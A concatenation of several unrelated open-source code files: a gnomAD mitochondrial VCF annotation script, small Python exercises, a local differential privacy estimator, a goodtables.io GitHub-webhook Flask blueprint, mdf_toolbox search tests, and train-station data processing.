\"w\")\n header = \"POS\tREF\tALT\tmax_hl\tAN\tAC_hom\tAC_het\tAF_hom\tAF_het\tfaf_hapmax_hom\tVARIANT_CLASS\tSYMBOL\tBIOTYPE\tConsequence\tProtein_position\tHGVSc\tHGVSp\tall_hl\tall_haplogroups\tmax_hap_AF_hom\tmax_pop_AF_hom\tmax_hl_SNV_base\tmax_hl_nonsyn_SNV_codon\tMitomap_dz_status\tMitomap_dz_heteroplasmy\tMitomap_dz_homoplasmy\tMitomap_disease\tAPOGEE\tMitotip\tPon_mt_trna\tHmtvar\"\n file.write(header + \"\\n\")\n\n for row in vcf:\n if not row[0].startswith(\"#\"):\n if row[6] == \"PASS\": # pass only sites\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n vep = row[7].split(\"vep=\")[1].split(\";\")[0]\n SYMBOL = vep.split(\"|\")[3]\n Protein_position = vep.split(\"|\")[14]\n\n if (\n POS in matches_base\n ): # this is the maximum heteroplasmy of a SNV at each base\n max_base = matches_base[POS]\n else:\n max_base = 0\n\n if (\n SYMBOL,\n Protein_position,\n ) in matches_codon: # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n max_codon = matches_codon[(SYMBOL, Protein_position)]\n else:\n max_codon = 0\n\n if (\n POS,\n REF,\n ALT,\n ) in matches_disease: # this is MITOMAP disease-associated variant\n mitomap_status = matches_disease[(POS, REF, ALT)][0]\n mitomap_het = matches_disease[(POS, REF, ALT)][1]\n mitomap_hom = matches_disease[(POS, REF, ALT)][2]\n mitomap_dz = matches_disease[(POS, REF, ALT)][3]\n else:\n mitomap_status = mitomap_het = mitomap_hom = mitomap_dz = \"\"\n\n if (\n SYMBOL,\n POS,\n ALT,\n ) in matches_insilico: # this is tRNA in silicos from the gnomAD VCF\n mitotip = matches_insilico[(SYMBOL, POS, ALT)][0]\n pon_mt = matches_insilico[(SYMBOL, POS, ALT)][1]\n else:\n mitotip = pon_mt = \"\"\n\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_apogee: # this is additional in silico for non-synonymous variants\n apogee = matches_apogee[(POS, REF, ALT, SYMBOL)]\n else:\n apogee = \"\"\n\n if ((POS, REF, ALT) in matches_hmtvar) and (\n SYMBOL.startswith(\"MT-T\")\n ): # this is additional in silico for tRNA variants\n hmtvar = matches_hmtvar[(POS, REF, ALT)]\n else:\n hmtvar = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + \"\\t\".join(\n str(x) for x in matches_annotations[POS, REF, ALT, SYMBOL]\n )\n + \"\\t\"\n + str(max_base)\n + \"\\t\"\n + str(max_codon)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\t\"\n + str(mitomap_dz)\n + \"\\t\"\n + str(apogee)\n + \"\\t\"\n + str(mitotip)\n + \"\\t\"\n + str(pon_mt)\n + \"\\t\"\n + str(hmtvar)\n + \"\\n\"\n )\n\n if (\n vep.count(\"|\") > 44\n ): # if two annotations, variant lies in 
two genes\n SYMBOL = vep.split(\"|\")[48]\n Protein_position = vep.split(\"|\")[59]\n\n if (\n SYMBOL,\n Protein_position,\n ) in matches_codon: # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n max_codon = matches_codon[(SYMBOL, Protein_position)]\n else:\n max_codon = 0\n\n if (\n SYMBOL,\n POS,\n ALT,\n ) in matches_insilico: # this is tRNA in silicos from the gnomAD VCF\n mitotip = matches_insilico[(SYMBOL, POS, ALT)][0]\n pon_mt = matches_insilico[(SYMBOL, POS, ALT)][1]\n else:\n mitotip = pon_mt = \"\"\n\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_apogee: # this is additional in silico for non-synonymous variants\n apogee = matches_apogee[(POS, REF, ALT, SYMBOL)]\n else:\n apogee = \"\"\n\n if ((POS, REF, ALT) in matches_hmtvar) and (\n SYMBOL.startswith(\"MT-T\")\n ): # this is additional in silico for tRNA variants\n hmtvar = matches_hmtvar[(POS, REF, ALT)]\n else:\n hmtvar = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + \"\\t\".join(\n str(x)\n for x in matches_annotations[POS, REF, ALT, SYMBOL]\n )\n + \"\\t\"\n + str(max_base)\n + \"\\t\"\n + str(max_codon)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\t\"\n + str(mitomap_dz)\n + \"\\t\"\n + str(apogee)\n + \"\\t\"\n + str(mitotip)\n + \"\\t\"\n + str(pon_mt)\n + \"\\t\"\n + str(hmtvar)\n + \"\\n\"\n )\n\n\n\"\"\"now generate a second output file 'annotated_synthetic.vcf', which is used to produce table S4\nfirst use a VEP annotated synthetic VCF for all possible SNVs in the mtDNA to create dictionaries of the consequences and locus of each possible SNV\ngather allele frequency and maximum heteroplasmy data from HelixMTdb for annotating, also annoate with MITOMAP allele frequency and disease-assocated variants gathered above\"\"\"\n\n\ndef consequences(synthetic_vcf_path: str):\n \"\"\"Create dictionaries of the VEP consequences and locus of every possible single nucleotide variant in the mtDNA.\n\n :param synthetic_vcf_path: path to the VEP annotated synthetic VCF output of split_vars_two_genes.py\n :return: matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp dictionaries linking relavant annotations to every base or variant\n \"\"\"\n with open(\n synthetic_vcf_path + \"NC_012920.1_synthetic_vep_splitvarstwogenes.vcf\"\n ) as vcf: # this file has been edited so that for variants in two genes, the consequence on each gene is listed on a separate line using split_vars_two_genes.py\n vcf = csv.DictReader(vcf, delimiter=\"\\t\")\n\n matches_locus = {} # gene name\n matches_conseq = {} # ie synonymous, missense, etc\n matches_HGVSp = {} # HGVSp\n matches_HGVSc = {} # HGVSc\n\n for row in vcf:\n base = str(row[\"POS\"])\n alt = row[\"ALT\"]\n gene = row[\"SYMBOL\"]\n\n if not base in matches_locus:\n matches_locus[base] = []\n if gene: # ie if base lies in a gene\n matches_locus[base] = [gene]\n else:\n matches_locus[base] = [\"non-coding\"]\n else: # if base lies in two genes\n if not gene:\n gene = \"non-coding\"\n if (\n not gene in matches_locus[base]\n ): # so only adding different gene names\n matches_locus[base].append(gene)\n\n if (\n not (base, alt) in matches_conseq\n ): # every base position will have a consequence\n matches_conseq[(base, alt)] = [row[\"Consequence\"]]\n else:\n matches_conseq[(base, alt)].append(row[\"Consequence\"])\n\n if not (base, alt) in matches_HGVSp:\n matches_HGVSp[(base, alt)] = [row[\"HGVSp\"]]\n else:\n 
matches_HGVSp[(base, alt)].append(row[\"HGVSp\"])\n\n if not (base, alt) in matches_HGVSc:\n matches_HGVSc[(base, alt)] = [row[\"HGVSc\"]]\n else:\n matches_HGVSc[(base, alt)].append(row[\"HGVSc\"])\n\n return (matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp)\n\n\ndef in_helix(other_databases_path: str):\n \"\"\"Extract allele frequency and maximum heteroplasmy data from the HelixMTdb database.\n\n :param other_databases_path: path to the other_databases directory with required file\n :return: helix_counts dictionary with relevant annotations for all observed variants\n \"\"\"\n with open(other_databases_path + \"HelixMTdb_20200327.tsv\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n helix_counts = {}\n\n for row in var_list:\n pos = str(row[\"locus\"].split(\"chrM:\")[1])\n ref = str(row[\"alleles\"].split('\"')[1])\n alt = str(row[\"alleles\"].split('\"')[3])\n\n if float(row[\"AF_hom\"]) > 0:\n max_het = float(1)\n elif float(row[\"AF_hom\"]) == 0:\n max_het = float(row[\"max_ARF\"])\n\n helix_counts[pos, ref, alt] = (\n max_het,\n float(row[\"AF_hom\"]),\n float(row[\"AF_het\"]),\n )\n\n return helix_counts\n\n\ndef annotate_syn_vcf(\n matches_annotations: Dict[\n Tuple[str, str, str, str],\n Tuple[\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n list,\n list,\n str,\n str,\n ],\n ],\n helix_counts: Dict[Tuple[str, str, str], Tuple[float, float, float]],\n mitomap_counts: Dict[Tuple[str, str, str], float],\n matches_locus: Dict[str, str],\n matches_conseq: Dict[Tuple[str, str], str],\n matches_HGVSc: Dict[Tuple[str, str], str],\n matches_HGVSp: Dict[Tuple[str, str], str],\n synthetic_vcf_path: str,\n):\n \"\"\"Generate a VCF of all possible SNVs in the mtDNA, with annotations that can be easily parsed for table generation.\n\n :param matches_annotations: dictionary linking gnomAD variants to relevant VCF annotations, produced by parse_vcf function\n :param helix_counts: dictionary with relevant annotations for all observed variants in HelixMTdb, produced by in_helix function\n :param mitomap_counts: dictionary with relevant annotations for all observed variants in MITOMAP, produced by in_mitomap function\n :params matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp: dictionaries linking relavant annotations to every base or variant, produced by consequences function\n :param synthetic_vcf_path: path to the VEP annotated synthetic VCF\n \"\"\"\n with open(synthetic_vcf_path + \"NC_012920.1_synthetic_vep.vcf\") as csv_file:\n synt_vcf = csv.reader(csv_file, delimiter=\"\\t\")\n\n file = open(\"annotated_synthetic.vcf\", \"w\")\n header = \"POS\tREF\tALT\tSYMBOL\tConsequence\tHGVSc\tHGVSp\tgnomAD_max_hl\tgnomAD_AF_hom\tgnomAD_AF_het\tHelix_max_hl\tHelix_af_hom\tHelix_af_het\tMitomap_af\tMitomap_dz_status\tMitomap_dz_heteroplasmy\tMitomap_dz_homoplasmy\"\n file.write(header + \"\\n\")\n\n for row in synt_vcf:\n if not row[0].startswith(\"#\"):\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n SYMBOL = row[7].split(\"|\")[3]\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_annotations: # annotations from gnomAD VCF\n in_gnomad_max = matches_annotations[(POS, REF, ALT, SYMBOL)][0]\n in_gnomad_afhom = matches_annotations[(POS, REF, ALT, SYMBOL)][4]\n in_gnomad_afhet = matches_annotations[(POS, REF, ALT, SYMBOL)][5]\n else:\n in_gnomad_max = in_gnomad_afhom = in_gnomad_afhet = 0\n\n if (POS, REF, ALT) in helix_counts: # annotations from HelixMTdb\n in_helix_max = helix_counts[(POS, REF, 
ALT)][0]\n in_helix_afhom = helix_counts[(POS, REF, ALT)][1]\n in_helix_afhet = helix_counts[(POS, REF, ALT)][2]\n else:\n in_helix_max = in_helix_afhom = in_helix_afhet = 0\n\n if (POS, REF, ALT) in mitomap_counts: # annotations from MITOMAP\n in_mitomap = mitomap_counts[(POS, REF, ALT)]\n else:\n in_mitomap = 0\n\n if (\n POS,\n REF,\n ALT,\n ) in matches_disease: # disease-associated variants from MITOMAP\n mitomap_status = matches_disease[(POS, REF, ALT)][0]\n mitomap_het = matches_disease[(POS, REF, ALT)][1]\n mitomap_hom = matches_disease[(POS, REF, ALT)][2]\n else:\n mitomap_status = mitomap_het = mitomap_hom = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + str(matches_locus[POS]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_conseq[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_HGVSc[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_HGVSp[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(in_gnomad_max)\n + \"\\t\"\n + str(in_gnomad_afhom)\n + \"\\t\"\n + str(in_gnomad_afhet)\n + \"\\t\"\n + str(in_helix_max)\n + \"\\t\"\n + str(in_helix_afhom)\n + \"\\t\"\n + str(in_helix_afhet)\n + \"\\t\"\n + str(in_mitomap)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\n\"\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--other_databases_path\",\n help=\"path to directory with MITOMAP and HelixMTdb files\",\n required=False,\n default=\"final_data_files/other_databases/\",\n )\n parser.add_argument(\n \"--insilicos_path\",\n help=\"path to directory with APOGEE and HmtVar files\",\n required=False,\n default=\"final_data_files/insilicos/\",\n )\n parser.add_argument(\n \"--synthetic_vcf_path\",\n help=\"path to directory with synthetic vcf files\",\n required=False,\n default=\"final_data_files/synthetic_vcf/\",\n )\n parser.add_argument(\n \"--gnomAD_path\",\n help=\"path to directory with gnomAD files (not publicly available)\",\n required=False,\n default=\"final_data_files/gnomAD/\",\n )\n args = parser.parse_args()\n\n print(\n \"Starting!\\nThis script will produce 2 output files: reformated.vcf and annotated_synthetic.vcf, which are the input files for the R scripts used to produce the figures and tables\"\n )\n\n # gather annotations for output \"reformated.vcf\", these are additional insilico and population frequency annotations\n (mitomap_counts, matches_disease) = in_mitomap(args.other_databases_path)\n matches_apogee = apogee(args.insilicos_path)\n matches_hmtvar = hmtvar_annotations(args.insilicos_path)\n print(\n \"gathered annotations!\\nNow will parse the gnomAD data, this might take ~15 minutes\"\n )\n # these are annotations extracted from the gnomAD data\n matches_samples = samples(args.gnomAD_path)\n (matches_annotations, matches_base, matches_codon, matches_insilico) = parse_vcf(\n matches_samples, args.gnomAD_path\n )\n # now write the output file \"reformated.vcf\", which is used to produce fig5, fig6, figS5d, figS7, figS8 and table S3\n write_file_for_figures(\n matches_annotations,\n matches_disease,\n matches_base,\n matches_codon,\n matches_insilico,\n matches_apogee,\n matches_hmtvar,\n args.gnomAD_path,\n )\n print(\n \"written file reformated.vcf!\\nNow will make the second output file annotated_synthetic.vcf\"\n )\n\n # now generate a second output file \"annotated_synthetic.vcf\", which is used to produce 
table S4, this output needs additional annotations vs \"reformated.vcf\", including from HelixMTdb\n (matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp) = consequences(\n args.synthetic_vcf_path\n )\n helix_counts = in_helix(args.other_databases_path)\n annotate_syn_vcf(\n matches_annotations,\n helix_counts,\n mitomap_counts,\n matches_locus,\n matches_conseq,\n matches_HGVSc,\n matches_HGVSp,\n args.synthetic_vcf_path,\n )\n print(\"written file annotated_synthetic.vcf!\\nScript is now complete\")\n","repo_name":"broadinstitute/gnomad-mitochondria","sub_path":"gnomad_mitochondria/manuscript_analyses/reformat_vcf.py","file_name":"reformat_vcf.py","file_ext":"py","file_size_in_byte":36482,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"10330074911","text":"# Write a function that takes two arguments. The function should:\n# if the arguments are of numeric types (int, float) - return the product of these arguments,\n# if both arguments are strings (str) - join them into a single string and return it,\n# in any other case return a tuple of these arguments\n\ndef dif_action(arg1, arg2):\n if (type(arg1) is int or type(arg1) is float) and (type(arg2) is int or type(arg2) is float):\n return arg1 * arg2\n elif type(arg1) is str and type(arg2) is str:\n return arg1 + arg2\n else:\n return (arg1, arg2)\n\nprint(dif_action(3, 3))\nprint(dif_action('Hello ', 'world'))\nprint(dif_action(3, 'world'))","repo_name":"AnnaKilimova/PythonBasic","sub_path":"HW6/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21838966","text":"import numpy as np\r\nimport math\r\nimport random\r\nimport copy\r\nimport xxhash\r\n\r\ndef olh(data, k, epsilon, delta):\r\n n = len(data)\r\n # compute optimal size of hash domain\r\n m = epsilon**2 * (n-1) / (14 * np.log(2 / delta))\r\n d = np.floor((m + 2) / 3)\r\n \r\n #compute local privacy budget, out of range has no privacy amplification\r\n epsilon_l = epsilon**2 * (n - 1) / (14 * np.log(2 / delta)) + 1 - d\r\n if epsilon_l < 1:\r\n epsilon_l = epsilon\r\n else:\r\n epsilon_l = np.log(epsilon_l)\r\n\r\n p = np.exp(epsilon_l) / (np.exp(epsilon_l) + d - 1)\r\n #q = 1 / (np.exp(epsilon_l) + d - 1)\r\n\r\n for i in range(n):\r\n v = data[i]\r\n x = (xxhash.xxh32(str(v), seed=i).intdigest() % d)\r\n y = x\r\n\r\n if random.random() > p:\r\n while y == x:\r\n y = np.random.randint(0, d)\r\n\r\n data[i] = y\r\n\r\n #estimate the randomized data\r\n pre_freq = np.zeros(k, dtype = int)\r\n for i in range(n):\r\n for v in range(k):\r\n if data[i] == (xxhash.xxh32(str(v), seed=i).intdigest() % d):\r\n pre_freq[v] += 1\r\n a = 1.0 * d / (p * d - 1)\r\n b = 1.0 * n / (p * d - 1)\r\n pre_freq = a * pre_freq - b\r\n\r\n return pre_freq\r\n\r\ndef compute_mse(data, k, epsilon, delta, nround):\r\n n = len(data)\r\n error = 0\r\n true_freq = np.bincount(data)\r\n\r\n for r in range(nround):\r\n pre_freq = olh(copy.deepcopy(data), k, epsilon, delta)\r\n error += np.square((true_freq - pre_freq) / n).sum() \r\n error = error / (k * nround)\r\n\r\n return error","repo_name":"noname-w/DUMP","sub_path":"SOLH.py","file_name":"SOLH.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6543079465","text":"import logging\nfrom flask import Blueprint, request, abort, 
jsonify\nfrom flask_login import login_required, current_user\nfrom goodtablesio import settings\nfrom goodtablesio.services import database\nfrom goodtablesio.models.internal_job import InternalJob\nfrom goodtablesio.utils.signature import validate_signature\nfrom goodtablesio.integrations.github.models.repo import GithubRepo\nfrom goodtablesio.integrations.github.tasks.repos import sync_user_repos\nfrom goodtablesio.integrations.github.utils.hook import (\n activate_hook, deactivate_hook, get_details_from_hook_payload)\nlog = logging.getLogger(__name__)\n\n\n# Module API\n\ngithub = Blueprint('github', __name__, url_prefix='/github')\n\n\n@github.record\ndef record_params(setup_state):\n github.debug = setup_state.app.debug\n\n\n@github.route('/hook', methods=['POST'])\ndef create_job():\n\n # Validate signature (throws 400 on invalid)\n if not github.debug:\n key = settings.GITHUB_HOOK_SECRET\n text = request.data\n signature = request.headers.get('X-Hub-Signature', '')\n if not validate_signature(key, text, signature):\n msg = 'Wrong signature for GitHub payload'\n log.error(msg)\n abort(400, msg)\n\n # Get payload details (throws 400 if no data or bad JSON)\n payload = request.get_json()\n details = get_details_from_hook_payload(payload)\n if details is None:\n msg = 'Wrong payload received'\n log.error(msg)\n abort(400, msg)\n if details == {}:\n return jsonify({})\n\n # Get source (throw 400 if no source)\n source_owner = details['owner']\n source_repo = details['repo']\n if details['is_pr']:\n source_owner = details['base_owner']\n source_repo = details['base_repo']\n source = database['session'].query(GithubRepo).filter(\n GithubRepo.name == '%s/%s' % (source_owner, source_repo)).one_or_none()\n if not source:\n msg = 'A job was requested on a repository not present in the DB'\n log.error(msg)\n abort(400, msg)\n\n # Create and start job (throw 400 if not started)\n job_id = source.create_and_start_job(conf=details)\n if not job_id:\n msg = 'A job was requested but can\\'t be started'\n log.error(msg)\n abort(400, msg)\n\n return jsonify({'job_id': job_id})\n\n\n# API\n\n# TODO:\n# it should be synced with general\n# approach we use for API (see api blueprint)\n\n@github.route('/api/sync_account')\n@login_required\ndef api_sync_account():\n error = None\n\n # Check syncing status\n if _is_user_repos_syncing(current_user.id):\n error = 'User repos are already syncing'\n\n # Run syncing\n if not error:\n # TODO:\n # Job create/run should be atomic\n # https://github.com/frictionlessdata/goodtables.io/issues/172\n job = InternalJob(name=sync_user_repos.name, user=current_user)\n database['session'].add(job)\n database['session'].commit()\n sync_user_repos.delay(current_user.id, job_id=job.id)\n\n return jsonify({\n 'error': error,\n })\n\n\n@github.route('/api/repo/<repo_id>')\n@login_required\ndef api_repo(repo_id):\n error = None\n repo_data = None\n\n # Get repo\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n repo_data = repo.to_api()\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n return jsonify({\n 'repo': repo_data,\n 'error': error,\n })\n\n\n@github.route('/api/repo')\n@login_required\ndef api_repo_list():\n error = None\n\n # Get repos\n repos = (\n database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n order_by(GithubRepo.active.desc(), GithubRepo.name).\n all())\n repos_data = [repo.to_api() for repo in 
repos]\n\n # Get syncing status\n syncing = _is_user_repos_syncing(current_user.id)\n\n return jsonify({\n 'repos': repos_data,\n 'syncing': syncing,\n 'error': error,\n })\n\n\n@github.route('/api/repo/<repo_id>/activate')\n@login_required\ndef api_repo_activate(repo_id):\n error = None\n\n # Get token\n token = current_user.github_oauth_token\n if not token:\n error = 'No valid GitHub token found'\n\n # Get repo\n if not error:\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n # Activate repo\n if not error:\n try:\n activate_hook(token, repo.owner, repo.repo)\n repo.active = True\n database['session'].commit()\n except Exception as exception:\n error = 'Repo activation error'\n log.exception(exception)\n\n # Validate repo\n if not error:\n repo.create_and_start_job()\n\n return jsonify({\n 'error': error,\n })\n\n\n@github.route('/api/repo/<repo_id>/deactivate')\n@login_required\ndef api_repo_deactivate(repo_id):\n error = None\n\n # Get token\n token = current_user.github_oauth_token\n if not token:\n error = 'No valid GitHub token found'\n\n # Get repo\n if not error:\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n # Deactivate repo\n if not error:\n try:\n deactivate_hook(token, repo.owner, repo.repo)\n repo.active = False\n database['session'].commit()\n except Exception as exception:\n log.exception(exception)\n error = 'Repo deactivation error'\n\n return jsonify({\n 'error': error,\n })\n\n\n# Internal\n\ndef _is_user_repos_syncing(user_id):\n return bool(\n database['session'].query(InternalJob).\n filter_by(\n name=sync_user_repos.name,\n user_id=user_id,\n finished=None).\n count())\n","repo_name":"AntoineAugusti/goodtables.io","sub_path":"goodtablesio/integrations/github/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"10938846284","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nfrom collections import defaultdict, deque\nfrom typing import List\n\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:\n \n graph = defaultdict(list)\n def construct(root, parent):\n\n if root and parent:\n graph[root.val].append(parent.val)\n graph[parent.val].append(root.val)\n \n if root.left:\n construct(root.left, root)\n \n if root.right:\n construct(root.right, root)\n \n construct(root, parent=None)\n res = []\n queue = deque([(target.val, 0)])\n visited = set([target.val])\n while queue:\n\n start, level = queue.popleft()\n if level == k:\n res.append(start)\n continue\n \n if level > k:\n break\n \n for nei in graph[start]:\n if nei not in visited:\n visited.add(nei)\n queue.append((nei, level + 1))\n \n return res","repo_name":"GelilaT/competitive_programming","sub_path":"all-nodes-distance-k-in-binary-tree.py","file_name":"all-nodes-distance-k-in-binary-tree.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44581457550","text":"import pytest\nimport re, os\n\nimport mdf_toolbox\n\n\nSEARCH_LIMIT = 10\n\n#github specific 
declarations\nclient_id = os.getenv('CLIENT_ID')\nclient_secret = os.getenv('CLIENT_SECRET')\non_github = os.getenv('GITHUB_ACTIONS') is not None\n\non_github = True\n\nauths = mdf_toolbox.confidential_login(client_id=client_id,\n client_secret=client_secret,\n services=['search'], make_clients=True)\nSEARCH_CLIENT = auths['search']\n\nINDEX = \"mdf\"\nSCROLL_FIELD = \"mdf.scroll_id\"\n\n\nclass DummyClient(mdf_toolbox.AggregateHelper, mdf_toolbox.SearchHelper):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, scroll_field=SCROLL_FIELD, **kwargs)\n\n\n# Helper\n# Return codes:\n# -1: No match, the value was never found\n# 0: Exclusive match, no values other than argument found\n# 1: Inclusive match, some values other than argument found\n# 2: Partial match, value is found in some but not all results\ndef check_field(res, field, regex):\n if on_github: return True\n \n dict_path = \"\"\n for key in field.split(\".\"):\n if key == \"[]\":\n dict_path += \"[0]\"\n else:\n dict_path += \".get('{}', {})\".format(key, \"{}\")\n # If no results, set matches to false\n all_match = (len(res) > 0)\n only_match = (len(res) > 0)\n some_match = False\n for r in res:\n vals = eval(\"r\"+dict_path)\n if vals == {}:\n vals = []\n elif type(vals) is not list:\n vals = [vals]\n # If a result does not contain the value, no match\n if regex not in vals and not any([re.search(str(regex), value) for value in vals]):\n all_match = False\n only_match = False\n # If a result contains other values, inclusive match\n elif len(vals) != 1:\n only_match = False\n some_match = True\n else:\n some_match = True\n\n if only_match:\n # Exclusive match\n return 0\n elif all_match:\n # Inclusive match\n return 1\n elif some_match:\n # Partial match\n return 2\n else:\n # No match\n return -1\n\n\ndef test_aggregate_internal(capsys):\n if on_github: return True\n \n q = DummyClient(index=INDEX, search_client=SEARCH_CLIENT, advanced=True)\n # Error on no query\n with pytest.raises(AttributeError):\n q.aggregate()\n\n # Basic aggregation\n res1 = q.aggregate(\"mdf.source_name:nist_xps_db\")\n assert len(res1) > 10000\n assert isinstance(res1[0], dict)\n\n # Multi-dataset aggregation\n q._SearchHelper__query[\"q\"] = \"(mdf.source_name:nist_xps_db OR mdf.source_name:khazana_vasp)\"\n res2 = q.aggregate()\n assert len(res2) > 10000\n assert len(res2) > len(res1)\n\n # Unnecessary aggregation fallback to .search()\n # Check success in Coveralls\n q._SearchHelper__query[\"q\"] = \"mdf.source_name:khazana_vasp\"\n assert len(q.aggregate()) < 10000\n\n\ndef test_aggregate_external():\n # Test that aggregate uses the current query properly\n # And returns results\n # And respects the reset_query arg\n \n if on_github: return True\n \n f = DummyClient(INDEX, search_client=SEARCH_CLIENT)\n f.match_field(\"mdf.source_name\", \"nist_xps_db\")\n res1 = f.aggregate(reset_query=False, index=\"mdf\")\n assert len(res1) > 10000\n assert check_field(res1, \"mdf.source_name\", \"nist_xps_db\") == 0\n res2 = f.aggregate()\n assert len(res2) == len(res1)\n assert check_field(res2, \"mdf.source_name\", \"nist_xps_db\") == 0\n","repo_name":"materials-data-facility/toolbox","sub_path":"tests/test_sub_helpers.py","file_name":"test_sub_helpers.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"38922049942","text":"import json\n\nimport random\ndef find_all_station():\n\n with open(\"D:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\" 
,\"r\",encoding=\"utf-8\") as jf:\n results = json.load(jf)\n\n for stations in results:\n\n for station in stations:\n train_station = station[\"train_station\"]\n\n if train_station in all_stations.keys():\n all_stations[train_station].append(station[\"station_id\"])\n else:\n all_stations[train_station] = [station[\"station_id\"]]\n\ndef find_max_time():\n times = []\n with open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\" ,\"r\",encoding=\"utf-8\") as jf:\n results = json.load(jf)\n\n for train in results.keys():\n times.append(len(results[train]))\n\n return min(times)\n\n\ndef handle_data():\n\n all_Infos = {}\n\n for station in all_stations.keys():\n all_Infos[station] = {}\n\n for station in all_Infos.keys():\n\n for results in all_stations[station]:\n all_Infos[station][results] = []\n\n with open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁具体信息.json\", \"r\", encoding=\"utf-8\") as jf:\n\n results = json.load(jf)\n for station_start in all_Infos:\n\n for train in all_Infos[station_start]:\n stations = []\n\n if len(results[train]) > 10:\n pass\n\n else:\n for station_info in results[train]:\n\n stations.append(station_info[\"train_station\"])\n\n for station in stations:\n\n if station == station_start:\n i = stations.index(station)\n\n for n in stations[i:]:\n all_Infos[station_start][train].append(n)\n\n for station in all_Infos:\n for train in list(all_Infos[station].keys()):\n if len(all_Infos[station][train]) <= 1:\n del all_Infos[station][train]\n else:pass\n times = []\n\n for station in list(all_Infos.keys()):\n if len(all_Infos[station]) == 0:\n del all_Infos[station]\n\n for station in list(all_Infos.keys()):\n if len(all_Infos[station]) == 0:\n print(station)\n\n for station in list(all_Infos.keys()):\n\n for train in all_Infos[station].keys():\n times.append(len(all_Infos[station][train]))\n\n print(max(times))\n\n return all_Infos\n\nif __name__ == '__main__':\n all_stations = {}\n find_all_station()\n\n all_Infos = handle_data()\n\n print(all_Infos)\n\n jsObj = json.dumps(all_Infos, ensure_ascii=False, indent=4)\n fileObject = open(\"G:\\软件工程课程设计\\全国高铁信息\\高铁车站出发信息.json\", \"w\", encoding=\"utf-8\")\n fileObject.write(jsObj)\n fileObject.close()","repo_name":"Easter/train-time-search","sub_path":"课程设计/handle_data.py","file_name":"handle_data.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"37149966715","text":"def findMatch(possibleMatches, crossword):\n for match in possibleMatches:\n is_matched = True\n match_length = len(match)\n if match_length == len(crossword):\n for i in range(match_length):\n if crossword[i] not in ['.', match[i]]:\n is_matched = False\n break\n if is_matched:\n return match\n\nmatches = [\n'vaporeon',\n'jolteon',\n'flareon',\n\"espeon\",\n\"umbreon\",\n\"leafeon\",\n\"glaceon\",\n\"sylveon\"\n]\n\ncrossword = 'g...eon'\nmatch = findMatch(matches, 